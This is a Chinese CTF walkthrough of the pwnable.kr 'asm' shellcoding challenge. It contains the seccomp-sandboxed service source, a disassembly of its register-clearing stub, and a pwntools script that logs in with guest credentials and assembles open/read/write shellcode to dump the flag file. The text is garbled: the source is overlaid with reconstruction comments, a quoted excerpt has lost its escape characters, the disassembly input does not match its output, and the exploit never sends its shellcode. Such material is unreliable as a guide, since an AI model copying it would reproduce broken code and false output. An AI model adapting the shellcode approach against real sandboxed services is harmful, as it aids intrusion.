大概意思就是：连接到 9026 端口，asm 在特权下执行并 get flag。
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>
#define LENGTH 128
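/*
 * Install a seccomp allow-list before any untrusted shellcode runs.
 *
 * The default action is SCMP_ACT_KILL, so every syscall not listed below
 * terminates the process.  Only open/read/write/exit/exit_group are allowed.
 * The filter matches by syscall number: e.g. openat is not on the list, so a
 * modern libc open() wrapper (which uses openat) would be killed even though
 * a raw SYS_open is permitted.
 *
 * Fails closed: if the filter cannot be created, populated or loaded, the
 * process exits with status 1 instead of continuing without a sandbox.
 * (The extracted listing had lost its closing braces and "\n" escapes;
 * this is the reconstructed form.)
 */
void sandbox(void){
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);
    if (ctx == NULL) {
        printf("seccomp error\n");
        exit(1);   /* never fall through and run the shellcode unfiltered */
    }

    /* Every syscall the shellcode is permitted to make. */
    const int allowed[] = {
        SCMP_SYS(open),
        SCMP_SYS(read),
        SCMP_SYS(write),
        SCMP_SYS(exit),
        SCMP_SYS(exit_group),
    };
    for (size_t i = 0; i < sizeof allowed / sizeof allowed[0]; i++) {
        /* seccomp_rule_add() returns a negative errno on failure; a rule that
         * silently failed to add would leave that syscall under SCMP_ACT_KILL. */
        if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, allowed[i], 0) < 0) {
            printf("seccomp error\n");
            exit(1);
        }
    }

    if (seccomp_load(ctx) < 0){
        printf("seccomp error\n");
        exit(1);
    }
}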
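/*
 * Prefix copied in front of the user's shellcode.  Decoded as x64 (0x48 and
 * 0x4d are REX prefixes) it is a run of `xor reg, reg` that zeroes
 * rax, rbx, rcx, rdx, rsi, rdi, rbp and r8..r15; rsp is left untouched.
 * It has no other effect: the user code simply starts from cleared registers.
 *
 * The extracted listing had lost the "\x" escapes; the 45 bytes are restored
 * here (none of them is 0x00, so strlen(stub) == 45 and sizeof(stub) == 46
 * including the terminating NUL).
 */
char stub[] =
    "\x48\x31\xc0"   /* xor rax, rax */
    "\x48\x31\xdb"   /* xor rbx, rbx */
    "\x48\x31\xc9"   /* xor rcx, rcx */
    "\x48\x31\xd2"   /* xor rdx, rdx */
    "\x48\x31\xf6"   /* xor rsi, rsi */
    "\x48\x31\xff"   /* xor rdi, rdi */
    "\x48\x31\xed"   /* xor rbp, rbp */
    "\x4d\x31\xc0"   /* xor r8,  r8  */
    "\x4d\x31\xc9"   /* xor r9,  r9  */
    "\x4d\x31\xd2"   /* xor r10, r10 */
    "\x4d\x31\xdb"   /* xor r11, r11 */
    "\x4d\x31\xe4"   /* xor r12, r12 */
    "\x4d\x31\xed"   /* xor r13, r13 */
    "\x4d\x31\xf6"   /* xor r14, r14 */
    "\x4d\x31\xff";  /* xor r15, r15 */

/* Declared in the original listing but never referenced by the code shown. */
unsigned char filter[256];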
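/*
 * Entry point of the "asm" shellcode practice service.
 *
 * Maps an RWX page at a fixed address, fills it with NOPs, copies the
 * register-clearing stub to its start, reads up to 1000 bytes of user
 * shellcode behind the stub, chroots to /home/asm_pwn and jumps into the page.
 *
 * Reconstructed from an extracted listing that had lost its "\n" escapes and
 * closing brace.  NOTE(review): as listed, main never calls sandbox(), so the
 * seccomp filter would not be installed before the jump; this may be an
 * omission of the extraction rather than of the original program — confirm
 * against the binary.
 *
 * Returns 0 only if the shellcode returns normally, 1 if setup fails.
 */
int main(int argc, char* argv[]){
    (void)argc;
    (void)argv;
    setvbuf(stdout, 0, _IONBF, 0);   /* unbuffered so prompts reach the client immediately */
    setvbuf(stdin, 0, _IOLBF, 0);
    printf("Welcome to shellcoding practice challenge.\n");
    printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");
    printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");
    printf("If this does not challenge you. you should play 'asg' challenge :)\n");

    /* Fixed-address anonymous RWX page.  The address is cast explicitly (the
     * original passed a bare integer), the protection is spelled out instead
     * of the magic 7, and fd is -1 as MAP_ANONYMOUS conventionally requires. */
    char* sh = (char*)mmap((void*)0x41414000, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC,
                           MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, -1, 0);
    if (sh == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memset(sh, 0x90, 0x1000);   /* 0x90 is x86 NOP: every byte not overwritten is a NOP */
    memcpy(sh, stub, strlen(stub));

    /* sizeof(stub) counts the terminating NUL, so the user's bytes start one
     * byte after the copied stub; that gap is a NOP from the memset above. */
    size_t offset = sizeof(stub);
    printf("give me your x64 shellcode: ");
    /* offset + 1000 < 0x1000, so the read stays inside the mapped page. */
    ssize_t n = read(0, sh+offset, 1000);
    if (n <= 0) {
        return 1;   /* EOF or error: nothing to run */
    }

    /* Jail the process before jumping.  The return value is checked so that a
     * failed chroot (e.g. missing CAP_SYS_CHROOT) does not silently run the
     * shellcode outside the jail.  Note there is no chdir("/") afterwards, so
     * the working directory remains the one inherited from outside the root. */
    if (chroot("/home/asm_pwn") != 0) {   // you are in chroot jail. so you can't use symlink in /tmp
        perror("chroot");
        return 1;
    }
    ((void (*)(void))sh)();   /* execute: stub first, then the user's bytes */
    return 0;
}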
1. 读取我们的输入：建立一个可执行的缓冲区，将 stub 拷入内存，并打印提示：
在此挑战中,您可以在SECCOMP沙箱下运行x64 shellcode
尝试制作仅使用open()/ read()/ write()系统调用输出标志的shellcode
/* Excerpt of main() quoted for the walkthrough (the "\n" escapes were lost
 * during extraction; the full listing above is the reference). */
setvbuf(stdout, 0, _IONBF, 0);   /* unbuffered stdout: prompts are sent immediately */
setvbuf(stdin, 0, _IOLBF, 0);
printf("Welcome to shellcoding practice challenge.n");
printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.n");
printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.n");
printf("If this does not challenge you. you should play 'asg' challenge :)n");
/* Anonymous page at a fixed address; protection 7 = PROT_READ|PROT_WRITE|PROT_EXEC. */
char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
memset(sh, 0x90, 0x1000);   /* 0x90 is x86 NOP: the rest of the page is a NOP sled */
memcpy(sh, stub, strlen(stub));   /* strlen(stub) bytes of the register-clearing prefix */
/* sizeof(stub) includes the trailing NUL, so user input lands one byte after the stub. */
int offset = sizeof(stub);
printf("give me your x64 shellcode: ");
read(0, sh+offset, 1000);   /* return value unchecked; offset+1000 stays inside the page */
chroot("/home/asm_pwn"); // you are in chroot jail. so you can't use symlink in /tmp
((void (*)(void))sh)();   /* jump to the page: stub runs first, then the user's bytes */
return 0;
我们来查看 stub 中的 shellcode，用 pwntools 反汇编：
Python 2.7.17 (default, Oct 19 2019, 23:36:22)
[GCC 9.2.1 20191008] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> print disasm("x48x31xc0x48x31xdbx48x31xc9x48x31xd2x48x31xf6x48x31xffx48x31xedx4dx31xc0x4dx31xc9x4dx31xd2x4dx31xdbx4dx31xe4x4dx31xedx4dx31xf6x4dx31xff")
0: 48 dec eax
1: 31 c0 xor eax, eax
3: 48 dec eax
4: 31 db xor ebx, ebx
6: 48 dec eax
7: 31 c9 xor ecx, ecx
9: 48 dec eax
a: 31 d2 xor edx, edx
c: 48 dec eax
d: 31 f6 xor esi, esi
f: 48 dec eax
10: 31 ff xor edi, edi
12: 48 dec eax
13: 31 ed xor ebp, ebp
15: 4d dec ebp
16: 31 c0 xor eax, eax
18: 4d dec ebp
19: 31 c9 xor ecx, ecx
1b: 4d dec ebp
1c: 31 d2 xor edx, edx
1e: 4d dec ebp
1f: 31 db xor ebx, ebx
21: 4d dec ebp
22: 31 e4 xor esp, esp
24: 4d dec ebp
25: 31 ed xor ebp, ebp
27: 4d dec ebp
28: 31 f6 xor esi, esi
2a: 4d dec ebp
2b: 31 ff xor edi, edi
分析一下这段 shellcode：除了将寄存器清 0 之外并无其他特殊功能。注意上面的反汇编是按 32 位模式解析的（pwntools 默认 arch 为 i386），其中的 0x48/0x4d 实际上是 x64 的 REX 前缀，在 64 位模式下这些指令是 xor rax, rax、xor r8, r8 等。
既然知道了只能使用 read/open/write/exit/exit_group 这几个系统调用，而仅用它们来读取 flag 文件其实已经足够了。
# Exploit script from the writeup (Python 2 / pwntools).  It logs in to the
# challenge host over ssh with the public guest account, connects from there
# to the service on localhost:9026, and assembles shellcode that uses only
# the syscalls the seccomp filter allows (open/read/write).
from pwn import *
# pwnable.kr's guest ssh account; the service is reached via localhost.
con = ssh(host='pwnable.kr',user='asm',password='guest',port=2222)
r = con.connect_remote('localhost',9026)
shellcode = ''
# Push the (very long) flag file name onto the stack; rsp then points at it.
shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
# open() the path at rsp; the returned fd is in rax.
shellcode += shellcraft.open('rsp')
# read the contents into the buffer at rsp; rax is open()'s return value (the fd)
shellcode += shellcraft.read('rax','rsp',100)
# write those 100 bytes to stdout (fd 1)
shellcode += shellcraft.write(1,'rsp',100)
r.recvuntil('give me your x64 shellcode: ')
print r.recvall()
get flag ????